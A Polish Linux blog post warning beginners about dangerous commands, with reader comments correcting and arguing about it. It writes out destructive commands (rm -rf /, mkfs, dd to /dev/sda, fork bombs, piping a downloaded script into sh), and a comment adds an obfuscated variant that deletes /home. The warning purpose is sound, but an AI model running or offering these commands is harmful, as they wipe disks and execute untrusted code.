Bądź: Wyszukaj na stronie z użyciem Google
reklama:

niedziela, 19 października 2008

Groźne polecenia w Ubuntu

Autor: , 10:20, niedziela, 19 października 2008


Często, gdy wpisujemy w konsoli polecenie wymagające uprawnień administratora zapominamy, że może ono być niebezpieczne dla naszego systemu. Ciągłe wpisywanie sudo spowszedniało do tego stopnia, że mało kto zastanawia się nad skutkiem działań nieznanej komendy. Pokażę dziś kilka poleceń, które bardzo szybko sprawią, że wasz system już więcej się nie uruchomi. Postarajcie się je dobrze zapamiętać by uniknąć w przyszłości przykrych niespodzianek.


Nie uruchamiajcie poniższych poleceń! Zapewniam, że działają :)

1) Jedno z najbardziej lubianych przez złośliwych użytkowników polecenie. Kasuje wszystkie widoczne pliki w katalogu "/":
rm -rf /
rm -rf .
rm -rf *


2) Reformat partycji. Wszystkie pliki na dysku zostają skasowane i zastąpione czystym układem partycji:
mkfs
mkfs.ext3
mkfs.anything

3) Manipulacja blokiem urządzeń. Zwykle niszczy system plików co doprowadza do utraty wszystkich danych:
jakaś_komenda > /dev/sda
dd if=/dev/urandom of=/dev/sda

4) Forkbomb. Tworzy nowe procesy systemowe do czasu aż zawiesi system, zmuszając do twardego restartu komputera mogącego być przyczyną utraty danych i czasami uszkodzenia niektórych sektorów dysku.
:(){:|:&};:
w Perlu:
fork while fork

5) Shellscript. Jeśli ktoś daje Ci link do skryptu, może w poleceniu załączyć kod jego automatyczne uruchomienie. Nie powinno się uruchamiać skryptów od osób którym nie ufamy.
wget http://sciezka/jakiś_plik
sh ./jakiś_plik
lub
wget http://sciezka/jakiś_plik -O- | sh


Jak widzicie, szkodliwych poleceń jest bardzo dużo. Oczywiście każde z nich można użyć w dobrym i złym celu. Pamiętajcie jednak by następnym razem gdy zobaczycie dziwnie wyglądające polecenie, dwa razy zastanowić się czy nie jest to przypadkiem jedna z wymienionych tu komend.



Komentarze 24 comments
Ventrue pisze...

" rm -rf /
rm -rf .
rm -rf * "

Pierwsze polecenie nie kasuje w aktywnym folderze, ale wszystkie pliki na / :)

"dd if=jakiś warunek=/dev/sda"

if nie oznacza tu warunku!
if=FILE read from FILE instead of stdin
Ta komenda powinna wyglądać np. tak:
dd if=/dev/urandom of=/dev/sda
gdzie if=/dev/uranodm to czytanie z urządzenia /dev/urandom i zapis z niego do /dev/sda :)

P.S: 12 podanych tu poleceń to nie "dużo", tak niefortunnie napisałeś to zdanie... ;)

Pozdrawiam

Sławek pisze...

dd if=input_file of=output_file
Popieram więc Ventrue.
Dodatkowo mała uwaga. Pokazana bomba forkowa nie zawiesza, kiluje lub coś z procesami, ale tworzy nowe w nieskończoność(tzn. w systemie jest pewien limit). W rezultacie system zajmuje się bez przerwy tworzeniem nowych procesów, a nie wykonywaniem innych zadań. W rezultacie wykonania tej komendy, nie można uruchamiać programów, gdyż wyczerpał się limit. Jest to podstawowy błąd w architekturze systemów operacyjnych i nie spotkałem się z systemem, gdzie zostałby on w pełni rozwiązany(zawsze istnieje jakiś limit procesów).
Pozdrawiam!
Pozdrawiam.

Adrian pisze...

Dziękuję za cenne uwagi, zmiany zostały już naniesione :)
Pozdrawiam

Anonimowy pisze...

Oj tak szczególnie na mkfs sie kiedyś przejechałem. Nadal nie rozumiem jak mogłem go pomylić z fsck, no ale stało się i zjadło 2 partycje ;/

Livio pisze...

Po prostu trzeba ruszyć głową a nie wklepywać bezmyślnie wszystko to, co się napotka.

Anonimowy pisze...

Tytuł "Groźne polecenia w Ubuntu" może sugerować laikom, że polecenia te są groźne tylko dla Ubuntu, podczas gdy są niezależne od dystrybucji i dotyczą całego Linuksa.

Livio pisze...

Anonimowy nr 2, pisz to pod każdym wpisem, a może autor zmieni zdanie i zrezygnuje z robienia tego błędu w każdym tytule.

dev/mygate pisze...
Ten komentarz został usunięty przez autora.
dev/mygate pisze...

Grozą powiewa tutaj niestety z innego powodu..... bynajmniej nie o polecenia tu chodzi. Nie wiem w jakim kierunku ma zmierzać Twój komercyjny blog. Powierzchniowo podejmowane tematy, lub metodyka kopiuj/wklej nie zwiastuje najlepszej przyszłości. Elementy krytycznej ironi są w większości komentarzy, może pora przemyśleć to i owo...? Nie rozumiem sensu, streszczony i bardzo okrojony przetłumaczony post z pominięciem wielu bardziej problematycznych poleceń przy okazji wprowadzając błędy. To nie dokładne tłumaczenie manuali, nie wiem jak prawidłowo nazwać ten news,lecz aż prosi się żeby zagłębiłeś się w to o czym piszesz i zrozumiałeś sens.

Adrian pisze...

Nie martwcie się, tak to jest jak sie samemu pisze. Już po prawie roku nie łatwo jest znaleźć ciekawy temat. Już niedługo zaczną na tym blogu pisać także inne osoby. Pozdrawiam

dev/mygate pisze...

"tak to jest jak sie samemu pisze" - co samemu piszesz?
"Już po prawie roku nie łatwo jest znaleźć ciekawy temat" - jak po prawie roku? ciekawych tematów nie poruszono, a tematyka pozwala na wręcz nieograniczone ich ilości.
"Nie martwcie się" - nie martwię się, zadałem konkretne pytania, na które nie odpowiedziałeś.

Anonimowy pisze...

dev/mygate
zacznij pisać swój blog ,lepszy z głębiej poruszonymi tematami mogą też być ciekawsze jeśli chcesz. Wygląda na to ,że grozą powiewia od Twojej frustracji ,której w inny sposob nie możesz wyładować ...

dev/mygate pisze...

anonimie: przykład frustracji by: wikipedia "Na przykład będę silnie sfrustrowany jeśli drzwi autobusu, do którego biegnę, zamkną mi się tuż przed nosem." No więc, ładuję ubucentrum.net czytam Groźne polecenia w Ubuntu (w UBUNTU), czytam, widzę odnośnik - źródło, czytam, jakże słusznie zauważyłeć o anonimie, czytam, i jakże sfrustrowany byłem tym, iż news miałby o wiele większe wartości gdyby był samym odnośnikiem, a autor (Adrian :) chyba poświęcił tematowi który przekładał tudzież opisywał mniej czasu, niż ja dziś na poranną ubikacje.

O Anonimie, być może, być może kiedyś to zrobię, być może blog, być może, być może coś innego. Być może opiszę groźne polecenia Ubuntu STOP nie tego nie zrobię - bo widzisz o anonimie ten temat tutaj został poprostu spartolony. Dziwne, że o anonimie, bronisz się jakobyś autorem był, podczas gdy ja zadałem mu konkretne pytania. Widzisz przekazuje pewną informacje pisząc ten blog, a ja zadałem pewne pytania. Nie ponieważ odczówam wewnętrzną potrzebe wyładowania się na autorze, jak zasugerowałeś nietrafnie lecz po to by autor w pewien sposób wybronił się z mojego odczucia.

Anonimowy pisze...

Szkoda, że autor do jednego worka wrzucił polecenia szkodliwe uruchamiane z prawami administratora i bez uprawnień - forkbomb i szkoda, że nie zamieścił informacji, że oraz jak przed forkbomb można się zabezpieczyć.

koliberek pisze...

A mnie się tam podoba. Ten blog to dobry start do zgłębiania tematów, które podrzuca autor. Sam prowadzę stronę i zdaję sobie sprawę jak trudno jest zapewnić ciągłość aktualnej informacji. A ten blog traktuję nie jako pełne źródło informacji tylko jako coś w rodzaju RSS. Jeśli chcę się o czymś dowiedzieć więcej zapuszczam po prostu Googlarkę.
Łyżka dziegciu: dla mnie jest tu zbyt dużo błędów językowych, ale do tego to w Internecie zdążyłem się już przyzwyczaić, niestety. Co nie znaczy, że nie mogłoby być lepiej.:-)
Tak czy inaczej Adrianowi dziękuję za ciekawą lekturę niemal każdego ranka i życzę powodzenia.

Anonimowy pisze...

a ja powiem tak, kiedys ten blog odwiedzałem codziennie, teraz już coraz rzadziej? dlaczego? bo autor choć ma duże ambicje złą wybrał droge... kiedyś były konkretne artykuły, coś fajnego mozna sie było dowiedzieć, a teraz są pisane jak by na siłę, albo tłumaczone debilne zagraniczne teksty.
wszystko było fajnie gdyby autor pisał rzadziej ale treściwie.
bo coraz bardziej ile na ilość i to już nie jest ciekawe.
a co do wygladu najlepszy był ten sprzed zmian, tzn. nie ten co był poprzednio, ale jeszcze poprzednio... był takie przejżysty i miał widok kategorii...

Ventrue pisze...

A ja się dalej trochę czepię punktu pierwszego :)


rm -rf / - usuwa rekursywnie wszystkie pliki bez potwierdzenia z / (w tym np. zamontowane partycje w trybie write :)) )

rm -rf . - usuwa rekursywnie wszystkie pliki bez potwierdzenia i bieżący katalog

rm -rf * - usuwa rekursywnie wszystkie (przez tą * właśnie) pliki znajdujące się w katalogu BEZ jego usuwania, bez potwierdzenia


Równie dobrze te polecenia mogłyby przybrać np. taką postać:

sudo s="r"; s2="$s"m; $($s2 -rf /home)

i /home mamy z głowy ;)

I tak dalej... :)
Pozdrowienia! :)

Anonimowy pisze...

:(){:|:&};:

Ta komenda wypluła mi błąd:

bash: błąd składni w pobliżu nieoczekiwanego tokenu '{:'

Adrian pisze...

@dev/mygate
Pozwól, że ustosunkuje się do twoich wypowiedzi. Zapewne teraz już nie zmienisz swojego nastawienia i będziesz dalej podawał kontrargumenty krytykujące tą stronę lub wpis albo nawet mnie. Cóż, powyższy post może i nie jest najwyższych lotów, ani nie wyczerpuje tematyki w 100%, ale kto powiedział, że ma taki właśnie być. Chodzi tu tylko o to by pokazać jakie zagrożenia mogą spotkać nieuważnych użytkowników. Dla niezaspokojonych dałem linka do oryginału w którym mogą poglębić swoje informacje w tym temacie. To tyle w temacie tego artykułu.

Teraz chciałbym napisać odpowiedź na twój komentarz: "tak to jest jak sie samemu pisze" - co samemu piszesz?
"Już po prawie roku nie łatwo jest znaleźć ciekawy temat" - jak po prawie roku? ciekawych tematów nie poruszono, a tematyka pozwala na wręcz nieograniczone ich ilości.
"Nie martwcie się" - nie martwię się, zadałem konkretne pytania, na które nie odpowiedziałeś."

- "co samemu piszesz?" - no wybacz, ale to dość płytkie pytanie. Większość artykułów na tym blogu napisałem sam. Nigdy niczego nie kopiowałem z innych stron i wklejałem tu w niezmienionej postaci. Włożyłem w too dużo pracy i pytanie wydaje mi się obraźliwe.

- "jak po prawie roku? ciekawych tematów nie poruszono," - otóż gdybyś bardziej się zainteresował wiedziałbyś, że ten blog prowadzę już od prawie roku. Twierdzenie że nie poruszyłem na tym blogu żadnego ciekawego tematu też uznaje za nie na miejscu.

- "nie martwię się, " tak wiem, niby czym.

Być możę ten komentarz uznasz za atak skierowany w Twoją stronę, jednak jest to tylko moja odpowiedź na twoje pytania. Proszę Cię tylko, żebyś nie wypisywał tu więcej takich głupot bo nie lubie kasować komentarzy.

Pozdrawiam.

dev/mygate pisze...

Nie odbieram tego jako atak. Ja też sam swojej wypowiedzi nie uważam za obraźliwej, argumentuje swoje wypowiedzi, a komentarze są po to by nie je usuwać, tylko poradzić tudzież kontrargumentować. Zachęca się do dyskusji, którą podjołem, przedstawiając swoją opinie i dając pare rad, pytania zadałem by odzwierciedlić o co mi chodzi, a nie by się zbulwersować na nie.

"co samemu piszesz?" - no wybacz, ale to dość płytkie pytanie. Większość artykułów na tym blogu napisałem sam. Nigdy niczego nie kopiowałem z innych stron i wklejałem tu w niezmienionej postaci. Włożyłem w too dużo pracy i pytanie wydaje mi się obraźliwe.
Ok, wprost, masz tekst EN, taki post na forum jak z tego newsa. Tłumaczysz go na pl, skracając drametrialnie całość, popełniając błędy, wybierając wyrwane fragmenty. Napisałem komentarz nie dla ataku, lecz musiałem zadać pytania. Po co robić kolejną fuszerkę? Podjołeś temat, masz art z forum ubuntu, ok. Opisując go u siebie serio, brakuje tu paru rzeczy. Zamiast na ilość newsów, można by przecież wgłębić się w temat, dopoczytać to tu, to tam. Dodać nie pseudo błędnie opisane ciekawostki tylko porządny profesjonalny tekst. To przecież chcesz robić? Tak?

że ten blog prowadzę już od prawie roku
Nie wiedziałem. Życze lat kolejnych.

Twierdzenie że nie poruszyłem na tym blogu żadnego ciekawego tematu też uznaje za nie na miejscu.

Napisałeś wcześniej:
Nie martwcie się, tak to jest jak sie samemu pisze. Już po prawie roku nie łatwo jest znaleźć ciekawy temat.

Widzisz, dla mnie ciekawy temat to właśnie to co opisywałeś tutaj. Jednak po przeczytaniu postanowiłem napisać komentarz. Pisząc, ciekawych tematów nie poruszono, miałem namyśli, iż nie podjołeś fajnego tematu, chociaż wybrałeś trafnie. Albo krótko z sensem, bez błędów, albo całość, dokładnie, z dodatkiem. Nikt nie broni, trafiać do userów początkujących. Porstym przykładem, itp. Tu, temat rozbudowałeś przekładając część dosyć istotnego w całości problematycznego tematu. Mało to, nie tylko ja, po komentarzach wnioskuję czuje niedosyt treści pomijając błędy, ale także niesmak braku rozwinięcia.

Dla niezaspokojonych dałem linka do oryginału w którym mogą poglębić swoje informacje w tym temacie.

Widzisz, wychodzisz z fajnym pomysłem. Podejmujesz się konkretnego zadania, a to właśnie tu powinneś opisać wszystko tak by każdy czuł się zaspokojony. Podając tekst napisany bazując na:

Zapewne teraz już nie zmienisz swojego nastawienia i będziesz dalej podawał kontrargumenty krytykujące tą stronę lub wpis albo nawet mnie

moje nastawienie:
wpis - podałem uwagi, jak to wykorzystasz to Twoja sprawa.

stronę - jakie moge mieć nastawienie do domeny, bloggera z standartowym css + zrobione logo. To treść strony się liczy w tym przypadku (wyjątkowo w kwesti blogów i standardowego css nie można posiadać chyba nastawienia do strony bo dla mnie w tej kwesti liczyłby się kod php, layout autorski, innowacyjne skrypty, zabezpieczenia - tutaj default by: blogger)

Ciebie - nie znam cię :) Uważam, że w złym kierunku podąrzasz to to pisze.

Odnośnie reszty:
kiedyś były konkretne artykuły, coś fajnego mozna sie było dowiedzieć, a teraz są pisane jak by na siłę, albo tłumaczone debilne zagraniczne teksty.
wszystko było fajnie gdyby autor pisał rzadziej ale treściwie.


- pierwsze tekty, starałeś się napisać lepiej. Niestety, zamiast dalej starać się, bo wiele wiele mogłeś wprowadzić i rozwinąć się, stopniowo coraz gorzej... Żadziej, a treściwie, plus to coś... Naprawde to byłby lepszy wybór.

Po roku prowadzenia bloga, o tematyce linuxa, doskonale wiesz, iż ciekawych tematów pozostało nieograniczonie wiele. Groźne polecenia "w UBUNTU" - proszę cię - to był ciekawy temat który potraktowałeś płytko przez co nie da rady skomentować nie krytykując.

Na sam koniec:
"co samemu piszesz?" - no wybacz, ale to dość płytkie pytanie. Większość artykułów na tym blogu napisałem sam.
Nie miałem zamiru Cię atakować, czy obrażać. Dla mnie napisanie samemu artykułu to podjęcie tematu, odpowiedni dobór paru materiałów. Indywidualne podejście, własne dodatki, wyszukane ciekawostki, opis nie zawierający podstawowych błędów rażących dla oka pod względem wartości. To natomiast, dla mnie było daremną próbą przetłumaczenia nieprawidłowo wybranych pod względem wartości fragmentów zagranicznego posta gdzie jego sens zagubił się, a tytuł zupełnie już nie odzwierciedlał tego co sam stworzyłeś.
Zadane pytanie:
"co samemu piszesz?"
nie było płytkie, bo gdybyś odpowiedział sobie na nie wiedziałbyś, iż nie poświęcałbym tyle swojego cennego czasu, na wypisywanie głupot jak to nazwałeś, lecz próbowałem ukierunkować Cię i pomóc. Niestety moje poprzednie starania, mam nadzieje, iż te już nie potraktowałeś tak samo jak naprawdę przeolbrzymi, ciekawy, wręcz niepowtarzalny pod wieloma względami (chociażby ilości czy klasyfikacji problematyki) temat. W moim komentarzu mogłeś dostrzeć też coś, czego nie dostrzegłeś odwalając fuszere przy pisaniu tego newsa.


ps. nie mogę doczekać się Twojej odpowiedzi, oraz kolejnych tekstów, oby moje rady nie poszły na marne

Adrian pisze...

@dev/mygate
Przyznam, że nie chce mi się już odpisywać na twój komentarz, takie argumenty można by pisać bez końca. Powiem tak, postaram się pisać ciekawsze artykuły lepiej wyczerpujące tematykę.

No niestety musze się jeszcze odnieść do layoutu :)

Prawie połowa kodu dotyczącego postów została w nim przepisana (oczywiście przeze mnie) całkowicie na nowo. Jeszcze nie wygląda to najlepiej, ale w weekend się tym zajmę.

Anonimowy pisze...

Groźne polecenia Linuksa a nie Ubuntu. Większość użytkowników Ubuntu klawiatury dotyka tylko przy czatowaniu / wysyłaniu poczty

Tomaas Hara pisze...

No cóż następuje zmiana pokoleniowa. -------------------------------------
Należe do pokolenia dla którego Ubuntu Linux to nie Linux a Ubuntu.

Wyśmiewacz pisze...

żal.pl składnia forkbomb powinna wyglądać tak:
:(){ :|:& };:
nawet wikipedia to wie, polecam lekturę [;

Prześlij komentarz


Popularne posty

Etykiety